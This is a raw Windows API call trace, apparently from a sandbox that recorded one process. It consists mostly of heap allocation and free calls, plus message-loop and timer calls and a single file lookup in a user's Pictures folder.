[0211.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0211.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0211.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0211.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0211.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0211.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0211.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0211.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0211.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0211.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0211.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0211.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0211.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0211.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0211.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719b8 [0211.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0211.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0211.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0211.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b88 [0211.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0211.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0211.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa720 [0211.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0211.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0211.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0211.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0211.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0211.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0211.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0211.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0211.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0211.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0211.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0211.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0211.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0211.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0211.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0211.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0211.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0211.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0211.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0211.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0211.696] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0211.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0211.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0211.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0211.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0211.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0211.697] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0211.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0211.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0211.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0211.697] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0211.697] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0211.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0211.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0211.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0211.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0211.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0211.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0211.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0211.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0211.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0211.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0211.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0211.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0211.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0211.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0211.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0211.699] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0211.699] TranslateMessage (lpMsg=0x8cf708) returned 0 [0211.699] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0211.699] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0211.699] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0211.699] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0211.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0211.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0211.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0211.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0211.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0211.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0211.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0211.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0211.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0211.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0211.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0211.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0211.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0211.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0211.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0211.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0211.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0211.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0211.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0211.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0211.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0211.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0211.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0211.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0211.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0211.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0211.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0211.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0211.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0211.701] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0211.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0211.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0211.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0211.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0211.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0211.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0211.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0211.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0211.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0211.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0211.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0211.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0211.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0211.701] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0211.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0211.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0211.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0211.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0211.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0211.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0211.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0211.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0211.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0211.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0211.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0211.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0211.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0211.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0211.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0211.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.702] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/v1scJjcpwcvzTSqU.png", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x342feca0, ftCreationTime.dwHighDateTime=0x1d5cff9, ftLastAccessTime.dwLowDateTime=0x3269c7b0, ftLastAccessTime.dwHighDateTime=0x1d5c85b, ftLastWriteTime.dwLowDateTime=0x3269c7b0, ftLastWriteTime.dwHighDateTime=0x1d5c85b, nFileSizeHigh=0x0, nFileSizeLow=0x89d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="v1scJjcpwcvzTSqU.png", cAlternateFileName="V1SCJJ~1.PNG")) returned 0x9e1bf8 [0211.702] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0211.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0211.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0211.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0211.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0211.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0211.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0211.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0211.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0211.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0211.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0211.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0211.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0211.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0211.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0211.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0211.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0211.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0211.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 